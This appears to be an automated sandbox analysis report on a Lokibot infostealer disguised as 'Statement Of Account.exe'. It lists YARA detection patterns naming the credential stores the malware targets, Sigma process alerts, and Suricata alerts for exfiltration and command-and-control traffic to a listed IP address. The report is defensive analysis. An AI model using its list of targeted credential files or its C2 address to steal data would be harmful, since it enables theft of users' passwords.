9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.Statement Of Account.exe.3a20000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Statement Of Account.exe.b80000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Statement Of Account.exe.b80000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Statement Of Account.exe.b80000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Statement Of Account.exe.b80000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Statement Of Account.exe.b80000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.svchost.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.svchost.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.svchost.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.svchost.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
10.2.svchost.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
10.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.svchost.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
10.2.svchost.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.2.Statement Of Account.exe.2eb0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.Statement Of Account.exe.2eb0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.Statement Of Account.exe.2eb0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.Statement Of Account.exe.2eb0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.Statement Of Account.exe.2eb0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.Statement Of Account.exe.3a20000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.Statement Of Account.exe.3a20000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.Statement Of Account.exe.3a20000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.Statement Of Account.exe.3a20000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
5.2.Statement Of Account.exe.3a20000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.Statement Of Account.exe.2fb0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
7.2.Statement Of Account.exe.a80000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
7.2.Statement Of Account.exe.a80000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
7.2.Statement Of Account.exe.a80000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
7.2.Statement Of Account.exe.a80000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
7.2.Statement Of Account.exe.a80000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
7.2.Statement Of Account.exe.a80000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
7.2.Statement Of Account.exe.a80000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
7.2.Statement Of Account.exe.a80000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.Statement Of Account.exe.a80000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
7.2.Statement Of Account.exe.a80000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
7.2.Statement Of Account.exe.a80000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
7.2.Statement Of Account.exe.a80000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
7.2.Statement Of Account.exe.a80000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 76 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6976, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 1520, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6976, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 1520, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:13.849294+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:15.023333+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49705	94.156.177.220	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:12.874031+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.345385+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.481650+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.620575+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.733946+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.863635+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.978873+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:23.111641+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.282179+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.410505+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.527265+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.675772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.825870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.955586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:31.270533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.403234+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.667352+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.995763+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:36.124868+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.232324+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.362776+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.488975+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.630175+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.777546+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:43.921773+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:45.046731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.191642+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.330074+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.455794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.612677+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.713925+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.825406+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.946537+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:54.062937+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.183722+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.307813+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.446376+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.580399+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.707698+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:01.137133+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.266873+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.602216+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.727181+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.865657+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.994667+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:08.135076+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.286646+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.443346+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.588271+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.760458+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.933889+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:15.074619+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:17.193763+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.323356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.490866+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.662609+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.790345+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.926086+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:24.055966+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.206621+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.372207+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.522769+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.649111+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.900539+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:31.042666+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.200989+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.352982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.500867+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.646903+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.996360+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:38.141525+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.303118+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.420434+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.538598+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.700130+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.837038+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:45.061399+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.189175+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.637134+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.773539+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.971106+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:51.110434+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.277798+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.448342+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:54.657779+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.818063+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:57.259902+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.416005+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.584177+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.744111+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:02.147704+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.273450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:05.224737+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.371984+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.611756+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.220	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
